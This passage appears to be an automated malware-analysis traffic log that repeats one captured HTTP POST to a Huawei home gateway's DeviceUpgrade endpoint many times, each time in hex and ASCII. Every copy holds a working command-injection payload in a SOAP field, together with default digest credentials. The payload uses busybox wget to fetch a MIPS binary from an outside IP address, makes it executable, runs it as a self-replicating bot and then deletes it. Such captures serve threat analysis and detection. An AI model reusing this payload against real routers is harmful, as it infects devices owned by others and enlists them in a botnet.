68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 